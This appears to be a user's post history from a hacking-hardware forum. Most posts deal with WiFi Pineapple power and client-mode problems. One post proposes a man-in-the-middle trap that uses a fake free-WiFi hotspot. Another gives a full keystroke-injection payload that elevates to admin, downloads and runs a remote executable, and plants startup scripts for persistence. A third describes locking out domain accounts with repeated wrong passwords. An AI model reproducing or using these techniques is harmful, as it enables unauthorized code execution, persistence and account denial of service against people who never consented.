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Posts posted by C3PBRO

  1. What do you want to do? its a very common adapter im sure you have another one around the house not doing anything, my adapter went bad as well on the second week, i just got another one, no biggie.

    I have a 12V 1.5 laying around, not sure if it will blow it. Happened to my mate with PoE, and if mine dies I'll be crazy mad.

  2. So my Mark V has been cruising along well. I made up a USB to DC power cable, and used it twice just to see if it would bootup. I then used my power supply a couple times after.

    However the other day i went to boot my pineapple up and it doesn't do anything, so i plugged it into the converter i made, at it works just fine. So i have come to the conclusion to adapter it came with is stuffed (and yes i did remove and replace my power plug adapter).

    What should i do?


  3. SO, i know this has been brought up before... But im literally up shit creek with no paddle.

    Is wlan0 ment to be radio1 and vis- versa? Just a bit confused with whats going on. (im having the "client mode" error)

    Oh and i have connect my pineapple via tether to my linux machine, so i have interent. I have also updated the "Client Mode" infusion, which didnt do anything...

    Cheers my technolustians.

  4. Have a look at your /etc/config/wireless file. If wlan0 is the b/g/n capable device and wlan1 is the b/g capable device you're good. But, if they're swapped it's a known issue with a few posts covering it and a fix on the way.

    Thanks for your help. Could i edit and swap the wireless cards in the config file?

    PS. I agree this forum really needs some more stickies to help us nooblets out :)

  5. Yea, so i just got my pineapple... Flashed it, works fine until i try to connect to another wifi access point. I enable both wireless cards, click on the "network" tile, then "client mode" and try to connect to my network. Within about 3 seconds my pineapple crashes and has a constant green LED with no other lights. After rebooting it has the same issue, so the only way to fix it is do a DIP switch reset.

    I have tried taking the encryption off the access point im trying to access as well, with no avail.


  6. Contact us at the Hakshop and we'll get you sorted. Really sorry about the inconvenience. I feel obliged to head south for some real world experience. So, Sydney or Melbourne?

    I live in Sydney! I hear a lot of tourists saying how amazing the Opera House & Harbour Bridge is, so i suggest Sydney... Anyway the hak5 team should totally visit down under ;)

  7. Hey guys, just bought a Mark 5 :D, just wondering with two chipsets now in the pineapple would it be possible to connect one to a network and use the other as the main-in-the-middle card? Therefore eliminating the need for a 3G/4G Dongle? For example:

    iPhone--->Searches for McDonalds Free Wifi--->Connects to pineapple (with Atheros chipset using karma)--->Pineapple connects to McDonalds free wifi using other RTL chipset--->Re-directs all trafic through your pineapple--->Possible Profit?


  8. This is my first payload, the delays are set for my slow netbook computer. You will have to run the cmd as an admin, to do this you could simply add a RUNAS command in cmd to my script. The whole proccess should be fairly fast, be sure to read the REM in the code to understand what it does. Enjoy!

    REM Downloads nircmd.exe (google search for more info)
    REM Saves it to %appdata%
    REM Makes a vbs script that tells the computer to say a message of your choice, saves it to the startup folder
    REM Creates a batch file that runs nircmd.exe on start up and makes sure the system volume is unmuted and set at full
    REM Reboots the computer in 5 minutes after proccess is complete
    DELAY 2000
    GUI r
    DELAY 200
    STRING cmd
    DELAY 200
    DELAY 200
    REM ###############################################################################################downloads nircmd.exe#################################################################################
    STRING runas /noprofile /user:%computername%\Administrator cmd
    DELAY 300
    STRING Perspective10
    DELAY 200
    DELAY 500
    STRING powershell (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/yb9f26ddf01yc4z/nircmd.exe?dl=1','%appdata%\nircmd.exe');"
    DELAY 200
    REM ########################################################################################finishes downloading nircmd.exe########################################################################################
    DELAY 6000
    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    DELAY 100
    REM #######################################################################################Starts vbs script that talks#########################################################################################
    STRING copy con hackasaurusrex.vbs
    STRING do
    STRING set fso=CreateObject("Scripting.FileSystemObject")
    STRING set shell=CreateObject("Wscript.Shell")
    STRING set Objvoice=CreateObject("SAPI.SpVoice")
    STRING Objvoice.Speak StrText
    STRING loop
    DELAY 200
    CTRL z
    REM #########################################################################################Ends vbs script that talks#######################################################################################
    STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
    DELAY 100
    #################################################################################Starts batch file for volume###############################################################################################
    STRING copy con volume.bat
    DELAY 200
    STRING @echo off
    STRING cd %appdata%
    DELAY 100
    STRING nircmd.exe mutesysvolume 0
    DELAY 200
    STRING nircmd.exe setsysvolume 65535
    DELAY 200
    STRING exit
    CTRL z
    ####################################################################Ends batch file for vomlume############################################################################################################
    STRING shutdown /r /t 300
    DELAY 100
    STRING exit
    DELAY 200
    STRING exit
    DELAY 200
  9. I have written a script much the same as what you have described. It entered a username on the active directory at a windows logon screen and continually entered the wrong password. In theory it will lock out the account. The only issue i came across was trying to get the delays right between the "Welcome" message and the actual login screen after each attempt.

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